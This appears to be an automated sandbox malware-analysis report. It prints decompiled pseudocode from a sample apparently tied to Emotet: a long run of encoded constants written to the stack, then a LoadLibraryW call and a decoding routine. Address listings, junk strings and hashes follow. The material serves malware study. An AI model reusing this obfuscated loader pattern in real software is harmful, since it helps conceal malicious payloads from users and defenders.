				 *((intOrPtr*)(_t458 - 0x450)) = 0x6f2c9de2;
				 *((intOrPtr*)(_t458 - 0x44c)) = 0x330288a8;
				 *((intOrPtr*)(_t458 - 0x448)) = 0xedc2455f;
				 *((intOrPtr*)(_t458 - 0x444)) = 0x66c0e420;
				 *((intOrPtr*)(_t458 - 0x440)) = 0xd73ab2e6;
				 *((intOrPtr*)(_t458 - 0x43c)) = 0x8be9554f;
				 *((intOrPtr*)(_t458 - 0x438)) = 0xcf5027b3;
				 *((intOrPtr*)(_t458 - 0x434)) = 0x9067ebc8;
				 *((intOrPtr*)(_t458 - 0x430)) = 0xaa22b0b3;
				 *((intOrPtr*)(_t458 - 0x42c)) = 0x3851fead;
				 *((intOrPtr*)(_t458 - 0x428)) = 0x2f7526b0;
				 *((intOrPtr*)(_t458 - 0x424)) = 0x5d4f1f1e;
				 *((intOrPtr*)(_t458 - 0x420)) = 0x4d3fdd93;
				 *((intOrPtr*)(_t458 - 0x41c)) = 0xddd9b7a8;
				 *((intOrPtr*)(_t458 - 0x418)) = 0x4c64278c;
				 *((intOrPtr*)(_t458 - 0x414)) = 0x920d0666;
				 *((intOrPtr*)(_t458 - 0x410)) = 0x68b2858a;
				 *((intOrPtr*)(_t458 - 0x40c)) = 0xcc1e1b51;
				 *((intOrPtr*)(_t458 - 0x408)) = 0x5d4cd103;
				 *((intOrPtr*)(_t458 - 0x404)) = 0x4b0b3d02;
				 *((intOrPtr*)(_t458 - 0x400)) = 0x3fff073d;
				 *((intOrPtr*)(_t458 - 0x3fc)) = 0xd88655c2;
				 *((intOrPtr*)(_t458 - 0x3f8)) = 0xb95f567d;
				 *((intOrPtr*)(_t458 - 0x3f4)) = 0x11b0fb7e;
				 *((intOrPtr*)(_t458 - 0x3f0)) = 0x77daa959;
				 *((intOrPtr*)(_t458 - 0x3ec)) = 0x438e29f3;
				 *((intOrPtr*)(_t458 - 0x3e8)) = 0xc5994ae2;
				 *((intOrPtr*)(_t458 - 0x3e4)) = 0xa6a045ad;
				 *((intOrPtr*)(_t458 - 0x3e0)) = 0x3d63e929;
				 *((intOrPtr*)(_t458 - 0x3dc)) = 0x79ec7dfa;
				 *((intOrPtr*)(_t458 - 0x3d8)) = 0x982cda2c;
				 *((intOrPtr*)(_t458 - 0x3d4)) = 0xf0f0cca7;
				 *((intOrPtr*)(_t458 - 0x3d0)) = 0x55a91b1b;
				 *((intOrPtr*)(_t458 - 0x3cc)) = 0x187f46cc;
				 *((intOrPtr*)(_t458 - 0x3c8)) = 0xa84022ec;
				 *((intOrPtr*)(_t458 - 0x3c4)) = 0x68f4cdd5;
				 *((intOrPtr*)(_t458 - 0x3c0)) = 0x69fc83cf;
				 *((intOrPtr*)(_t458 - 0x3bc)) = 0xdf75514e;
				 *((intOrPtr*)(_t458 - 0x3b8)) = 0xd7493ee1;
				 *((intOrPtr*)(_t458 - 0x3b4)) = 0xf957dba7;
				 *((intOrPtr*)(_t458 - 0x3b0)) = 0x5711ace8;
				 *((intOrPtr*)(_t458 - 0x3ac)) = 0xfec64cd4;
				 *((intOrPtr*)(_t458 - 0x3a8)) = 0xd219ac6e;
				 *((intOrPtr*)(_t458 - 0x3a4)) = 0xb9dd49ba;
				 *((intOrPtr*)(_t458 - 0x3a0)) = 0xf1c1aaf2;
				 *((intOrPtr*)(_t458 - 0x39c)) = 0xfa862c04;
				 *((intOrPtr*)(_t458 - 0x398)) = 0xf6cd5af7;
				 *((intOrPtr*)(_t458 - 0x394)) = 0x895f4760;
				 *((intOrPtr*)(_t458 - 0x390)) = 0x13ca523e;
				 *((intOrPtr*)(_t458 - 0x38c)) = 0x5bf7b752;
				 *((intOrPtr*)(_t458 - 0x388)) = 0xd722a54f;
				 *((intOrPtr*)(_t458 - 0x384)) = 0x5ac47bfc;
				 *((intOrPtr*)(_t458 - 0x380)) = 0x8ff35fb7;
				 *((intOrPtr*)(_t458 - 0x37c)) = 0xad1a5747;
				 *((intOrPtr*)(_t458 - 0x378)) = 0x91c91da6;
				 *((intOrPtr*)(_t458 - 0x374)) = 0xcb7e89ca;
				 *((intOrPtr*)(_t458 - 0x370)) = 0xbb02fcf3;
				 *((intOrPtr*)(_t458 - 0x36c)) = 0xd7e583b;
				 *((intOrPtr*)(_t458 - 0x368)) = 0x12d4eea1;
				 *((intOrPtr*)(_t458 - 0x364)) = 0x19b30eb3;
				 *((intOrPtr*)(_t458 - 0x360)) = 0xf11f081b;
				 *((intOrPtr*)(_t458 - 0x35c)) = 0x8d8fc20b;
				 *((intOrPtr*)(_t458 - 0x358)) = 0x25dadec;
				 *((intOrPtr*)(_t458 - 0x354)) = 0xa6162487;
				 *((intOrPtr*)(_t458 - 0x350)) = 0xa583471e;
				 *((intOrPtr*)(_t458 - 0x34c)) = 0xf49f8fe;
				 *((intOrPtr*)(_t458 - 0x348)) = 0x7a6bf328;
				 *((intOrPtr*)(_t458 - 0x344)) = 0xe01f04ab;
				 *((intOrPtr*)(_t458 - 0x340)) = 0x53b5bd1c;
				 *((intOrPtr*)(_t458 - 0x33c)) = 0xac336357;
				 *((intOrPtr*)(_t458 - 0x338)) = 0xbe3885cc;
				 *((intOrPtr*)(_t458 - 0x334)) = 0xa129f609;
				 *((intOrPtr*)(_t458 - 0x330)) = 0x13657743;
				 *((intOrPtr*)(_t458 - 0x32c)) = 0xd1e2fa2d;
				 *((intOrPtr*)(_t458 - 0x328)) = 0x48c685fa;
				 *((intOrPtr*)(_t458 - 0x324)) = 0x8447bee7;
				 *((intOrPtr*)(_t458 - 0x320)) = 0x266e1477;
				 *((intOrPtr*)(_t458 - 0x31c)) = 0x3006ffe4;
				 *((intOrPtr*)(_t458 - 0x318)) = 0xaf83da7a;
				 *((intOrPtr*)(_t458 - 0x314)) = 0x7fb38b8b;
				 *((intOrPtr*)(_t458 - 0x310)) = 0x69a5a93d;
				 *((intOrPtr*)(_t458 - 0x30c)) = 0x7b7235d4;
				 *((intOrPtr*)(_t458 - 0x308)) = 0x651115ef;
				 *((intOrPtr*)(_t458 - 0x304)) = 0x4b9ec357;
				 *((intOrPtr*)(_t458 - 0x300)) = 0x5292425b;
				 *((intOrPtr*)(_t458 - 0x2fc)) = 0xd78eee4;
				 *((intOrPtr*)(_t458 - 0x2f8)) = 0x19162831;
				 *((intOrPtr*)(_t458 - 0x2f4)) = 0x77537276;
				 *((intOrPtr*)(_t458 - 0x2f0)) = 0xaa601805;
				 *((intOrPtr*)(_t458 - 0x2ec)) = 0xd144598e;
				 *((intOrPtr*)(_t458 - 0x2e8)) = 0x4ae3acdf;
				 *((intOrPtr*)(_t458 - 0x2e4)) = 0xb61fddfb;
				 *((intOrPtr*)(_t458 - 0x2e0)) = 0xcde1ea6e;
				 *((intOrPtr*)(_t458 - 0x2dc)) = 0x444f3549;
				 *((intOrPtr*)(_t458 - 0x2d8)) = 0xf115d51b;
				 *((intOrPtr*)(_t458 - 0x2d4)) = 0xe89e8176;
				 *((intOrPtr*)(_t458 - 0x2d0)) = 0xb081a7e9;
				 *((intOrPtr*)(_t458 - 0x2cc)) = 0xb1fcd9f3;
				 *((intOrPtr*)(_t458 - 0x2c8)) = 0xc542dd5d;
				 *((intOrPtr*)(_t458 - 0x2c4)) = 0xa18d833a;
				 *((intOrPtr*)(_t458 - 0x2c0)) = 0x6d034f35;
				 *((intOrPtr*)(_t458 - 0x2bc)) = 0x53a15a01;
				 *((intOrPtr*)(_t458 - 0x2b8)) = 0xbbb7d74e;
				 *((intOrPtr*)(_t458 - 0x2b4)) = 0x1eed101f;
				 *((intOrPtr*)(_t458 - 0x2b0)) = 0x3c760d89;
				 *((intOrPtr*)(_t458 - 0x2ac)) = 0xbfda7826;
				 *((intOrPtr*)(_t458 - 0x2a8)) = 0x1b942e9f;
				 *((intOrPtr*)(_t458 - 0x2a4)) = 0x5a729f8a;
				 *((intOrPtr*)(_t458 - 0x2a0)) = 0x7897d276;
				 *((intOrPtr*)(_t458 - 0x29c)) = 0x3be5f0ff;
				 *((intOrPtr*)(_t458 - 0x298)) = 0xf5227339;
				 *((intOrPtr*)(_t458 - 0x294)) = 0x4d681776;
				 *((intOrPtr*)(_t458 - 0x290)) = 0x2552c3bf;
				 *((intOrPtr*)(_t458 - 0x28c)) = 0x647a00e0;
				 *((intOrPtr*)(_t458 - 0x288)) = 0x49b9f45a;
				 *((intOrPtr*)(_t458 - 0x284)) = 0x4e1fb5ee;
				 *((intOrPtr*)(_t458 - 0x280)) = 0x2ed5015;
				 *((intOrPtr*)(_t458 - 0x27c)) = 0x10383c27;
				 *((intOrPtr*)(_t458 - 0x278)) = 0xb8a0a2aa;
				 *((intOrPtr*)(_t458 - 0x274)) = 0x1d3cd2df;
				 *((intOrPtr*)(_t458 - 0x270)) = 0x87eeb113;
				 *((intOrPtr*)(_t458 - 0x26c)) = 0xfd10e020;
				 *((intOrPtr*)(_t458 - 0x268)) = 0x997bbe97;
				 *((intOrPtr*)(_t458 - 0x264)) = 0xd9765f4c;
				 *((intOrPtr*)(_t458 - 0x260)) = 0x85eb0547;
				 *((intOrPtr*)(_t458 - 0x25c)) = 0x942f670;
				 *((intOrPtr*)(_t458 - 0x258)) = 0xc177bce9;
				 *((intOrPtr*)(_t458 - 0x254)) = 0xf5c76bb;
				 *((intOrPtr*)(_t458 - 0x250)) = 0x70946d51;
				 *((intOrPtr*)(_t458 - 0x24c)) = 0x369b12a0;
				 *((intOrPtr*)(_t458 - 0x248)) = 0x57a8f614;
				 *((intOrPtr*)(_t458 - 0x244)) = 0xcf251ab4;
				 *((intOrPtr*)(_t458 - 0x240)) = 0xe749b259;
				 *((intOrPtr*)(_t458 - 0x23c)) = 0x1bfc4bb6;
				 *((intOrPtr*)(_t458 - 0x238)) = 0x94aabb06;
				 *((intOrPtr*)(_t458 - 0x234)) = 0x7b874450;
				 *((intOrPtr*)(_t458 - 0x230)) = 0x6c6099d9;
				 *((intOrPtr*)(_t458 - 0x22c)) = 0xc0ea1b84;
				 *((intOrPtr*)(_t458 - 0x228)) = 0xe8f0eff6;
				 *((intOrPtr*)(_t458 - 0x224)) = 0x5f844d8c;
				 *((intOrPtr*)(_t458 - 0x220)) = 0x13c8bc55;
				 *((intOrPtr*)(_t458 - 0x21c)) = 0x3fd57c84;
				 *((intOrPtr*)(_t458 - 0x218)) = 0x9f600e35;
				 *((intOrPtr*)(_t458 - 0x214)) = 0xc194c32a;
				 *((intOrPtr*)(_t458 - 0x210)) = 0x8689e68e;
				 *((intOrPtr*)(_t458 - 0x20c)) = 0x392b67fb;
				 *((intOrPtr*)(_t458 - 0x208)) = 0xae81f054;
				 *((intOrPtr*)(_t458 - 0x204)) = 0x19f97d8a;
				 *((intOrPtr*)(_t458 - 0x200)) = 0xe67c22b4;
				 *((intOrPtr*)(_t458 - 0x1fc)) = 0x80134361;
				 *((intOrPtr*)(_t458 - 0x1f8)) = 0x911bc406;
				 *((intOrPtr*)(_t458 - 0x1f4)) = 0x2fb3992d;
				 *((intOrPtr*)(_t458 - 0x1f0)) = 0x361c00cb;
				 *((intOrPtr*)(_t458 - 0x1ec)) = 0xff632ea4;
				 *((intOrPtr*)(_t458 - 0x1e8)) = 0xf5095783;
				 *((intOrPtr*)(_t458 - 0x1e4)) = 0x4a91f216;
				 *((intOrPtr*)(_t458 - 0x1e0)) = 0x5a8803e0;
				 *((intOrPtr*)(_t458 - 0x1dc)) = 0x159ae6b9;
				 *((intOrPtr*)(_t458 - 0x1d8)) = 0xd45fb44f;
				 *((intOrPtr*)(_t458 - 0x1d4)) = 0x66ce62e1;
				 *((intOrPtr*)(_t458 - 0x1d0)) = 0xc9457fab;
				 *((intOrPtr*)(_t458 - 0x1cc)) = 0x624faadb;
				 *((intOrPtr*)(_t458 - 0x1c8)) = 0x90670fc;
				 *((intOrPtr*)(_t458 - 0x1c4)) = 0xf2309aa6;
				 *((intOrPtr*)(_t458 - 0x1c0)) = 0x1051d1bc;
				 *((intOrPtr*)(_t458 - 0x1bc)) = 0xa7086226;
				 *((intOrPtr*)(_t458 - 0x1b8)) = 0x7c784b46;
				 *((intOrPtr*)(_t458 - 0x1b4)) = 0x8c162390;
				 *((intOrPtr*)(_t458 - 0x1b0)) = 0x6fd97b55;
				 *((intOrPtr*)(_t458 - 0x1ac)) = 0xcffa16ef;
				 *((intOrPtr*)(_t458 - 0x1a8)) = 0x8fd0e83f;
				 *((intOrPtr*)(_t458 - 0x1a4)) = 0xbae82af6;
				 *((intOrPtr*)(_t458 - 0x1a0)) = 0x1dc9e9e3;
				 *((intOrPtr*)(_t458 - 0x19c)) = 0xce43faf8;
				 *((intOrPtr*)(_t458 - 0x198)) = 0x5c64b3ae;
				 *((intOrPtr*)(_t458 - 0x194)) = 0x46b61507;
				 *((intOrPtr*)(_t458 - 0x190)) = 0xfa06676;
				 *((intOrPtr*)(_t458 - 0x18c)) = 0xbda36a33;
				 *((intOrPtr*)(_t458 - 0x188)) = 0x85be4308;
				 *((intOrPtr*)(_t458 - 0x184)) = 0x21782aaa;
				 *((intOrPtr*)(_t458 - 0x180)) = 0xdf4821c4;
				 *((intOrPtr*)(_t458 - 0x17c)) = 0x423352fb;
				 *((intOrPtr*)(_t458 - 0x178)) = 0xcc75e1c3;
				 *((intOrPtr*)(_t458 - 0x174)) = 0xec2effc7;
				 *((intOrPtr*)(_t458 - 0x170)) = 0x8b81e46d;
				 *((intOrPtr*)(_t458 - 0x16c)) = 0xd72ab33c;
				 *((intOrPtr*)(_t458 - 0x168)) = 0x795e5b8e;
				 *((intOrPtr*)(_t458 - 0x164)) = 0x8f281fb9;
				 *((intOrPtr*)(_t458 - 0x160)) = 0x8367df5e;
				 *((intOrPtr*)(_t458 - 0x15c)) = 0x8a6371e1;
				 *((intOrPtr*)(_t458 - 0x158)) = 0xe5c382b7;
				 *((intOrPtr*)(_t458 - 0x154)) = 0x2e8ae82c;
				 *((intOrPtr*)(_t458 - 0x150)) = 0xe07c17d7;
				 *((intOrPtr*)(_t458 - 0x14c)) = 0xebfcc6c0;
				 *((intOrPtr*)(_t458 - 0x148)) = 0xc93bc6f;
				 *((intOrPtr*)(_t458 - 0x144)) = 0x4339e276;
				 *((intOrPtr*)(_t458 - 0x140)) = 0xe066581c;
				 *((intOrPtr*)(_t458 - 0x13c)) = 0x8f94f706;
				 *((intOrPtr*)(_t458 - 0x138)) = 0x2fbd3552;
				 *((intOrPtr*)(_t458 - 0x134)) = 0x375de5eb;
				 *((intOrPtr*)(_t458 - 0x130)) = 0xfa79b3d7;
				 *((intOrPtr*)(_t458 - 0x12c)) = 0xf494e268;
				 *((intOrPtr*)(_t458 - 0x128)) = 0x60e94453;
				 *((intOrPtr*)(_t458 - 0x124)) = 0xb9aad604;
				 *((intOrPtr*)(_t458 - 0x120)) = 0xaf7037c4;
				 *((intOrPtr*)(_t458 - 0x11c)) = 0x356d856b;
				 *((intOrPtr*)(_t458 - 0x118)) = 0x97dcdd11;
				 *((intOrPtr*)(_t458 - 0x114)) = 0xf67e22f9;
				 *((intOrPtr*)(_t458 - 0x110)) = 0x740f58ff;
				 *((intOrPtr*)(_t458 - 0x10c)) = 0x41f8f4c8;
				 *((intOrPtr*)(_t458 - 0x108)) = 0xba3ef071;
				 *((intOrPtr*)(_t458 - 0x104)) = 0xf280b86c;
				 *((intOrPtr*)(_t458 - 0x100)) = 0xbf859c4c;
				 *((intOrPtr*)(_t458 - 0xfc)) = 0xf87efbbf;
				 *((intOrPtr*)(_t458 - 0xf8)) = 0x54fc53bf;
				 *((intOrPtr*)(_t458 - 0xf4)) = 0x13e20347;
				 *((intOrPtr*)(_t458 - 0xf0)) = 0x32db63b2;
				 *((intOrPtr*)(_t458 - 0xec)) = 0x8b82eebc;
				 *((intOrPtr*)(_t458 - 0xe8)) = 0xba583bcc;
				 *((intOrPtr*)(_t458 - 0xe4)) = 0xa7933b16;
				 *((intOrPtr*)(_t458 - 0xe0)) = 0xe9aab750;
				 *((intOrPtr*)(_t458 - 0xdc)) = 0x4d39111d;
				 *((intOrPtr*)(_t458 - 0xd8)) = 0xce85029;
				 *((intOrPtr*)(_t458 - 0xd4)) = 0xba52ae4c;
				 *((intOrPtr*)(_t458 - 0xd0)) = 0x65966e3f;
				 *((intOrPtr*)(_t458 - 0xcc)) = 0xdc48fa27;
				 *((intOrPtr*)(_t458 - 0xc8)) = 0xd0a092ee;
				 *((intOrPtr*)(_t458 - 0xc4)) = 0x19d84942;
				 *((intOrPtr*)(_t458 - 0xc0)) = 0x189fc3f8;
				 *((intOrPtr*)(_t458 - 0xbc)) = 0x2d81ce0d;
				 *((intOrPtr*)(_t458 - 0xb8)) = 0x79237d0a;
				 *((intOrPtr*)(_t458 - 0xb4)) = 0xf43ae721;
				 *((intOrPtr*)(_t458 - 0xb0)) = 0x396c4832;
				 *((intOrPtr*)(_t458 - 0xac)) = 0xad82a21e;
				 *((intOrPtr*)(_t458 - 0xa8)) = 0x63cf86a6;
				 *((intOrPtr*)(_t458 - 0xa4)) = 0xeb571a80;
				 *((intOrPtr*)(_t458 - 0xa0)) = 0x86f15feb;
				 *((intOrPtr*)(_t458 - 0x9c)) = 0xd28d838a;
				_push(0x10f9141c);
				 *((intOrPtr*)(_t458 - 0x98)) = 0xfe8dfb44;
				 *((intOrPtr*)(_t458 - 0x94)) = 0x4370c9d;
				 *((intOrPtr*)(_t458 - 0x90)) = 0x1da1668;
				 *((intOrPtr*)(_t458 - 0x8c)) = 0x251429a;
				 *((intOrPtr*)(_t458 - 0x88)) = 0x89015f28;
				 *((intOrPtr*)(_t458 - 0x84)) = 0xbfc77fb0;
				 *((intOrPtr*)(_t458 - 0x80)) = 0xa39618a7;
				 *((intOrPtr*)(_t458 - 0x7c)) = 0x939ef23b;
				 *((intOrPtr*)(_t458 - 0x78)) = 0xe5a12e67;
				 *((intOrPtr*)(_t458 - 0x74)) = 0xc50bbbcf;
				 *((intOrPtr*)(_t458 - 0x70)) = 0x8820bf78;
				 *((intOrPtr*)(_t458 - 0x6c)) = 0x371d16a4;
				 *((intOrPtr*)(_t458 - 0x68)) = 0xa9fa143c;
				 *((intOrPtr*)(_t458 - 0x64)) = 0x80ee9485;
				 *((intOrPtr*)(_t458 - 0x60)) = 0x353f2b20;
				 *((intOrPtr*)(_t458 - 0x5c)) = 0x4456af21;
				 *((intOrPtr*)(_t458 - 0x58)) = 0x1dd7bd92;
				 *((intOrPtr*)(_t458 - 0x54)) = 0x4e8e3507;
				 *((intOrPtr*)(_t458 - 0x50)) = 0xb6d9592c;
				 *((intOrPtr*)(_t458 - 0x4c)) = 0x6b8eb4b3;
				 *((intOrPtr*)(_t458 - 0x48)) = 0x53054c9b;
				 *((intOrPtr*)(_t458 - 0x44)) = 0xb80a7f52;
				 *((intOrPtr*)(_t458 - 0x40)) = 0xce9a943e;
				 *((intOrPtr*)(_t458 - 0x3c)) = 0x10881e00;
				 *((intOrPtr*)(_t458 - 0x38)) = 0x98674cb6;
				 *((intOrPtr*)(_t458 - 0x34)) = 0xe1c2946c;
				 *((intOrPtr*)(_t458 - 0x30)) = 0xc433ea8e;
				 *((intOrPtr*)(_t458 - 0x2c)) = 0x2ab6fbdf;
				 *((intOrPtr*)(_t458 - 0x28)) = 0x819602d2;
				 *((intOrPtr*)(_t458 - 0x24)) = 0xb8fb5e08;
				 *((intOrPtr*)(_t458 - 0x20)) = 0xb2e89823;
				 *((intOrPtr*)(_t458 - 0x1c)) = 0x27f13fd;
				 *((intOrPtr*)(_t458 - 0x18)) = 0x4efc0ded;
				 *((intOrPtr*)(_t458 - 0x14)) = 0xf6aedfef;
				 *((intOrPtr*)(_t458 - 0x10)) = 0xf5e01de1;
				 *((intOrPtr*)(_t458 - 0xc)) = 0xbf4c0dac;
				 *((intOrPtr*)(_t458 - 8)) = 0x41ca0d05;
				 *((intOrPtr*)(_t458 - 4)) = 0x7c5e35b;
				_t456 = L041D1D10(0x41e3370, 0x1b8, __edi, __esi);
				 *0x41e71e4 = LoadLibraryW(_t444);
				L041D1DB0(_t456);
				return E041D1570(_t448,  *0x41e71e4, _t458 - 0x6e8, _t456, 0x1ba, 0x13b56120, 0x41e5450);
			}

0x041d814a
0x041d814a
0x041d8154
0x041d815e
0x041d8168
0x041d8172
0x041d817c
0x041d8186
0x041d8190
0x041d819a
0x041d81a4
0x041d81ae
0x041d81b8
0x041d81c2
0x041d81cc
0x041d81d6
0x041d81e0
0x041d81ea
0x041d81f4
0x041d81fe
0x041d8208
0x041d8212
0x041d821c
0x041d8226
0x041d8230
0x041d823a
0x041d8244
0x041d824e
0x041d8258
0x041d8262
0x041d826c
0x041d8276
0x041d8280
0x041d828a
0x041d8294
0x041d829e
0x041d82a8
0x041d82b2
0x041d82bc
0x041d82c6
0x041d82d0
0x041d82da
0x041d82e4
0x041d82ee
0x041d82f8
0x041d8302
0x041d830c
0x041d8316
0x041d8320
0x041d832a
0x041d8334
0x041d833e
0x041d8348
0x041d8352
0x041d835c
0x041d8366
0x041d8370
0x041d837a
0x041d8384
0x041d838e
0x041d8398
0x041d83a2
0x041d83ac
0x041d83b6
0x041d83c0
0x041d83ca
0x041d83d4
0x041d83de
0x041d83e8
0x041d83f2
0x041d83fc
0x041d8406
0x041d8410
0x041d841a
0x041d8424
0x041d842e
0x041d8438
0x041d8442
0x041d844c
0x041d8456
0x041d8460
0x041d846a
0x041d8474
0x041d847e
0x041d8488
0x041d8492
0x041d849c
0x041d84a6
0x041d84b0
0x041d84ba
0x041d84c4
0x041d84ce
0x041d84d8
0x041d84e2
0x041d84ec
0x041d84f6
0x041d8500
0x041d850a
0x041d8514
0x041d851e
0x041d8528
0x041d8532
0x041d853c
0x041d8546
0x041d8550
0x041d855a
0x041d8564
0x041d856e
0x041d8578
0x041d8582
0x041d858c
0x041d8596
0x041d85a0
0x041d85aa
0x041d85b4
0x041d85be
0x041d85c8
0x041d85d2
0x041d85dc
0x041d85e6
0x041d85f0
0x041d85fa
0x041d8604
0x041d860e
0x041d8618
0x041d8622
0x041d862c
0x041d8636
0x041d8640
0x041d864a
0x041d8654
0x041d865e
0x041d8668
0x041d8672
0x041d867c
0x041d8686
0x041d8690
0x041d869a
0x041d86a4
0x041d86ae
0x041d86b8
0x041d86c2
0x041d86cc
0x041d86d6
0x041d86e0
0x041d86ea
0x041d86f4
0x041d86fe
0x041d8708
0x041d8712
0x041d871c
0x041d8726
0x041d8730
0x041d873a
0x041d8744
0x041d874e
0x041d8758
0x041d8762
0x041d876c
0x041d8776
0x041d8780
0x041d878a
0x041d8794
0x041d879e
0x041d87a8
0x041d87b2
0x041d87bc
0x041d87c6
0x041d87d0
0x041d87da
0x041d87e4
0x041d87ee
0x041d87f8
0x041d8802
0x041d880c
0x041d8816
0x041d8820
0x041d882a
0x041d8834
0x041d883e
0x041d8848
0x041d8852
0x041d885c
0x041d8866
0x041d8870
0x041d887a
0x041d8884
0x041d888e
0x041d8898
0x041d88a2
0x041d88ac
0x041d88b6
0x041d88c0
0x041d88ca
0x041d88d4
0x041d88de
0x041d88e8
0x041d88f2
0x041d88fc
0x041d8906
0x041d8910
0x041d891a
0x041d8924
0x041d892e
0x041d8938
0x041d8942
0x041d894c
0x041d8956
0x041d8960
0x041d896a
0x041d8974
0x041d897e
0x041d8988
0x041d8992
0x041d899c
0x041d89a6
0x041d89b0
0x041d89ba
0x041d89c4
0x041d89ce
0x041d89d8
0x041d89e2
0x041d89ec
0x041d89f6
0x041d8a00
0x041d8a0a
0x041d8a14
0x041d8a1e
0x041d8a28
0x041d8a32
0x041d8a3c
0x041d8a46
0x041d8a50
0x041d8a5a
0x041d8a64
0x041d8a6e
0x041d8a78
0x041d8a82
0x041d8a8c
0x041d8a96
0x041d8aa0
0x041d8aaa
0x041d8ab4
0x041d8abe
0x041d8ac8
0x041d8ad2
0x041d8adc
0x041d8ae6
0x041d8af0
0x041d8afa
0x041d8b04
0x041d8b0e
0x041d8b18
0x041d8b22
0x041d8b2c
0x041d8b36
0x041d8b40
0x041d8b4a
0x041d8b54
0x041d8b5e
0x041d8b68
0x041d8b72
0x041d8b7c
0x041d8b86
0x041d8b90
0x041d8b9a
0x041d8ba4
0x041d8bae
0x041d8bb8
0x041d8bc2
0x041d8bcc
0x041d8bd6
0x041d8be0
0x041d8bea
0x041d8bf4
0x041d8bfe
0x041d8c08
0x041d8c12
0x041d8c1c
0x041d8c26
0x041d8c30
0x041d8c3a
0x041d8c44
0x041d8c4e
0x041d8c58
0x041d8c62
0x041d8c6c
0x041d8c76
0x041d8c80
0x041d8c8a
0x041d8c94
0x041d8c9e
0x041d8ca8
0x041d8cb2
0x041d8cbc
0x041d8cc6
0x041d8cd0
0x041d8cda
0x041d8ce4
0x041d8cee
0x041d8cf8
0x041d8d02
0x041d8d0c
0x041d8d16
0x041d8d20
0x041d8d2a
0x041d8d34
0x041d8d3e
0x041d8d48
0x041d8d52
0x041d8d5c
0x041d8d66
0x041d8d70
0x041d8d7a
0x041d8d84
0x041d8d8e
0x041d8d98
0x041d8da2
0x041d8dac
0x041d8db6
0x041d8dc0
0x041d8dca
0x041d8dd4
0x041d8dde
0x041d8de8
0x041d8df2
0x041d8dfc
0x041d8e06
0x041d8e10
0x041d8e1a
0x041d8e24
0x041d8e2e
0x041d8e38
0x041d8e42
0x041d8e4c
0x041d8e56
0x041d8e60
0x041d8e6a
0x041d8e74
0x041d8e7e
0x041d8e88
0x041d8e92
0x041d8e9c
0x041d8ea6
0x041d8eb0
0x041d8eba
0x041d8ec4
0x041d8ece
0x041d8ed8
0x041d8ee2
0x041d8eec
0x041d8ef6
0x041d8f00
0x041d8f0a
0x041d8f14
0x041d8f1e
0x041d8f28
0x041d8f32
0x041d8f3c
0x041d8f46
0x041d8f50
0x041d8f5a
0x041d8f64
0x041d8f6e
0x041d8f78
0x041d8f82
0x041d8f8c
0x041d8f96
0x041d8fa0
0x041d8faa
0x041d8fb4
0x041d8fbe
0x041d8fc8
0x041d8fd2
0x041d8fdc
0x041d8fe6
0x041d8ff0
0x041d8ffa
0x041d9004
0x041d900e
0x041d9018
0x041d9022
0x041d902c
0x041d9036
0x041d9040
0x041d904a
0x041d9054
0x041d905e
0x041d9068
0x041d9072
0x041d907c
0x041d9086
0x041d9090
0x041d909a
0x041d90a4
0x041d90ae
0x041d90b8
0x041d90c2
0x041d90cc
0x041d90d6
0x041d90e0
0x041d90ea
0x041d90f4
0x041d90fe
0x041d9108
0x041d9112
0x041d911c
0x041d912b
0x041d9135
0x041d913f
0x041d9149
0x041d9153
0x041d915d
0x041d9164
0x041d916b
0x041d9172
0x041d9179
0x041d9180
0x041d9187
0x041d918e
0x041d9195
0x041d919c
0x041d91a3
0x041d91aa
0x041d91b1
0x041d91b8
0x041d91bf
0x041d91c6
0x041d91cd
0x041d91d4
0x041d91db
0x041d91e2
0x041d91e9
0x041d91f0
0x041d91f7
0x041d91fe
0x041d9205
0x041d920c
0x041d9213
0x041d921a
0x041d9221
0x041d9228
0x041d922f
0x041d9236
0x041d9245
0x041d9250
0x041d9255
0x041d9281

APIs

LoadLibraryW.KERNEL32(00000000), ref: 041D9248

Strings

+?5, xrefs: 041D9195
)c=, xrefs: 041D88DE
]7, xrefs: 041D8F8C
`[3f, xrefs: 041D85F0
2Hl9, xrefs: 041D90D6
v9C, xrefs: 041D8F64
TyFi, xrefs: 041D8212
id]], xrefs: 041D86E0
}#y, xrefs: 041D90C2
FKx|, xrefs: 041D8E42
`h, xrefs: 041D8550
9N, xrefs: 041D8726
\Oh, xrefs: 041D86F4
', xrefs: 041D833E
SD`, xrefs: 041D8FAA
GQ:, xrefs: 041D8460
;X~, xrefs: 041D8A00
-v8W, xrefs: 041D84BA
x, xrefs: 041D8B18
vrSw, xrefs: 041D8B2C
I5OD, xrefs: 041D8B68
= L-, xrefs: 041D8500

Memory Dump Source

Source File: 00000000.00000002.655519273.00000000041D1000.00000020.00000001.sdmp, Offset: 041D0000, based on PE: true

Associated: 00000000.00000002.655514422.00000000041D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.655533816.00000000041E1000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.655540744.00000000041E2000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41d0000_emo.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: }#y$ +?5$)c=$-v8W$2Hl9$;X~$= L-$FKx|$GQ:$I5OD$SD`$TyFi$\Oh$`[3f$id]]$vrSw$v9C$'$9N$`h$]7$x
API String ID: 1029625771-4077638660
Opcode ID: 10c6638868d8939975b12c365237a9b0decf7ffdf8cf567000807a9bc538c056
Instruction ID: 5b2e51ccbe001b8d03c4022145d0fb0e83d5efe7a2508b4cbd55d7e50f94d9b2
Opcode Fuzzy Hash: 10c6638868d8939975b12c365237a9b0decf7ffdf8cf567000807a9bc538c056
Instruction Fuzzy Hash: AD82A5F48567A98FDB619F429E857CEBA31BB51304F5082C8C19D3B215CB760B86CF89

Uniqueness

Uniqueness Score: -1.00%

Function 041DA78A, Relevance: 39.0, APIs: 1, Strings: 21, Instructions: 474
libraryCOMMON

Download Yara Rule

C-Code - Quality: 99%

			E041DA78A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t458;
				void* _t468;

				_t458 = __ebx;
				 *((intOrPtr*)(_t468 - 0x710)) = 0xbbfc645e;
				 *((intOrPtr*)(_t468 - 0x70c)) = 0xff9e9182;
				 *((intOrPtr*)(_t468 - 0x708)) = 0x452698cc;
				 *((intOrPtr*)(_t468 - 0x704)) = 0x3e315c09;
				 *((intOrPtr*)(_t468 - 0x700)) = 0xd583af25;
				 *((intOrPtr*)(_t468 - 0x6fc)) = 0x26128328;
				 *((intOrPtr*)(_t468 - 0x6f8)) = 0x80297ce5;
